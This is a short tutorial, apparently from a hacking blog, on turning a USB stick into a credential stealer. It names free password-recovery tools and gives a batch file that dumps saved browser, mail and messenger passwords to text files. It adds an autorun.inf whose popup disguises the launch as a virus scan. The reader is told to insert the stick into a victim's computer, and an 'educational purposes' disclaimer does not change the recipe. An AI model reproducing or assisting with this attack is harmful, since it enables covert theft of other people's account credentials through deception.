Windows allows the storage of the passwords . So does the modern browsers . Well this feature is for the convenience of the users , though has imposed itself as a big security risk among the organisations . As we know that Browsers stores most of its passwords on daily basis, Such as MSN messenger passwords, Yahoo passwords, Myspace passwords etc. Most of people have
lack of time and they had just asked their Browser/windows to save their passwords . As we know that there are many tools to recover Saved passwords, so in this article I will explain you on how to make a USB password stealer and steal saved passwords.

Just to explain the idea , we are going to collect some password stealing tools , these tools that are freely available on the internet wild and capable of stealing the stored passwords in the browsers or other windows files .

Then we create a Batch program that will execute these programs combined and store the stolen usernames and passwords in a text file .

To further spice up the penetration testing demonstration , we will also make this Batch file execute as an Auto-run for the USB stick . Basically stealing the passwords as we plug it in .


MessenPass – MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications.

Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express, windows mail, POP3 etc..

IE Passview – IE passview is a small program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) – Protected Storage Passview is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox.

ChromePass – ChromePass is a small password recovery tool that allows you to view the use

names and passwords stored by Google Chrome Web browser.

1.First of all download all 5 tools and copy the executables (.exe files) i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it:

 ACTION= Perform a Virus Scan

Save the Notepad and rename it from New Text “Document.txt” to “autorun.inf”
Now copy the autoruninffile onto your USB pendrive.

3. Create another Notepad and write the following text onto

start mspass.exe /stext mspass.txt
 start mailpv.exe /stext mailpv.txt
 start iepv.exe /stext iepv.txt
 start pspv.exe /stext pspv.txt
 start passwordfox.exe /stext passwordfox.txt

4. Save the Notepad and rename it from New Text
Document.txt to launch.bat

5. Copy the launch.bat file also to your USB drive. Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan)

After this you can see saved password in .TXT files

Purely for the Educational Purposes . Use the tools at your own Risk !

